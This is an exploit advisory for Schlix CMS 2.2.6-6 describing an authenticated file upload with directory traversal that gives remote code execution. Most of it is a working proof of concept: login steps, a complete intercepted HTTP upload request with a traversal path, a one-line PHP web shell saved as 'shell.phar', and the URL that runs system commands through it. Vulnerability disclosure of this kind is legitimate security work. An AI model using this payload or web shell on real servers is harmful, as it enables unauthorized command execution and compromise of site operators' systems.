Schlix CMS 2.2.6-6 Shell Upload / Directory Traversal

2021.05.25
Credit: Emir Polat
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated) # Date: 21.05.2021 # Exploit Author: Emir Polat # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/html/schlix-cms-downloads.html # Version: 2.2.6-6 # Tested On: Ubuntu 20.04 (Firefox) ############################################################################################################ Summary: An authorized user can upload a file with a .phar extension to a path of his choice and control the content as he wishes. This causes RCE vulnerability. For full technical details and source code analysis: https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e. ############################################################################################################ PoC: 1-) Login to admin panel with true credentials and go to "Tools -> Mediamanager" menu from left side. 2-) Click the "Upload File" and upload a file and catch the request with Burp. 3-) Change the "uploadstartpath", "filename" and file content as follows. # Request POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1 Host: vulnerable-server Content-Length: 846 X-Schlix-Ajax: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybllOFLruz1WAs7K2 Accept: */* Origin: http:// <http://10.211.55.4/>vulnerable-server Referer: http://vulnerable-server/schlix/admin/app/core.mediamanager <http://10.211.55.4/schlix/admin/app/core.mediamanager> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf; schlix-your-cookie;__atuvc=5%7C20; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Connection: close ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="_csrftoken" {your_csrf_token} ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="uploadstartpath" /media/docs/....//....//....//....//system/images/avatars/large/ ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="filedata[]"; filename="shell.phar" <?PHP system($_GET['rce']);?> ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="filedata__total_file_size" 0 ------WebKitFormBoundarybllOFLruz1WAs7K2 Content-Disposition: form-data; name="filedata__max_file_count" 20 ------WebKitFormBoundarybllOFLruz1WAs7K2-- 4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top